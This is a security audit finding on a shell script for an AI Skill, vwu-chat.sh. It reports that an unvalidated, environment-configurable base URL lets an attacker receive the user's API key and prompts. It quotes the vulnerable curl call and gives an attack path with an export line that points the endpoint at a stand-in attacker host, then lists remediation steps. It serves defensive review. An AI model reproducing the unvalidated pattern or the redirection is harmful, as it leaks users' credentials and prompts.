T09 · Insecure Skill Coding Practices
- Location
vwu-chat.sh:7- Finding
API Key and Prompt Exfiltration Through an Unvalidated Configurable Endpoint
- Content
View full analysis
Vulnerability Details
File Location:
vwu-chat.sh, lines 7 and 29-39
Vulnerability Type: Unvalidated API endpoint configuration leading to credential disclosure
Risk Level: HighVulnerable Code
zsh VWU_BASE_URL="${VWU_BASE_URL:-https://vwu.ai}"zsh # Call API response=$(curl -s "$VWU_BASE_URL/v1/chat/completions" \ -H "Content-Type: application/json" \ -H "Authorization: Bearer $VWU_API_KEY" \ -d "{ \"model\": \"$MODEL\", \"messages\": [{\"role\": \"user\", \"content\": \"$PROMPT\"}], \"stream\": false }")Technical Analysis
The destination receiving the bearer credential is controlled by the
VWU_BASE_URLenvironment variable. The script does not validate the URL scheme, hostname, port, or final destination before attaching theAuthorization: Bearerheader.Although the documented destination is
https://vwu.ai, a parent process, compromised launcher, altered shell profile, or unsafe automation environment can setVWU_BASE_URLto an attacker-controlled server. The subsequentcurlinvocation will transmit both the complete API key and the user's prompt to that server.The implementation also permits an unencrypted
http://endpoint, which could expose credentials and prompts to network interception.Attack Path
- An attacker gains the ability to influence the environment used to launch the script, such as through a wrapper, shell configuration, CI configuration, or compromised parent process.
- The attacker sets
VWU_BASE_URLto an endpoint they control:sh export VWU_BASE_URL="https://attacker.example" - The user configures a valid
VWU_API_KEYand invokes the Skill. - The script sends a request to
https://attacker.example/v1/chat/completions. - The request contains the complete API key in its bearer authorization header and the model and prompt in its body.
- The attacker c ...[truncated 830 chars]
- Remediation
View remediation
Remediation Suggestions
- Remove
VWU_BASE_URLconfigurability if this Skill is intended to communicate only with vwu.ai. - Otherwise, parse and validate the configured URL before sending credentials:
- Require the
httpsscheme. - Permit only an explicit allowlist of trusted hostnames.
- Reject embedded credentials, unexpected ports, fragments, and ambiguous hostname encodings.
- Compare a parsed hostname rather than using substring or suffix checks.
- Require the
- Do not attach an authorization header until the destination has passed validation.
- Consider separating development endpoint overrides from production behavior and requiring an explicit command-line opt-in before credentials may be sent to a non-default endpoint.
- Document any supported endpoint override so users understand where credentials and prompts may be transmitted.
- Use restrictive execution environments to prevent untrusted processes or configuration files from modifying security-sensitive environment variables.
- Remove
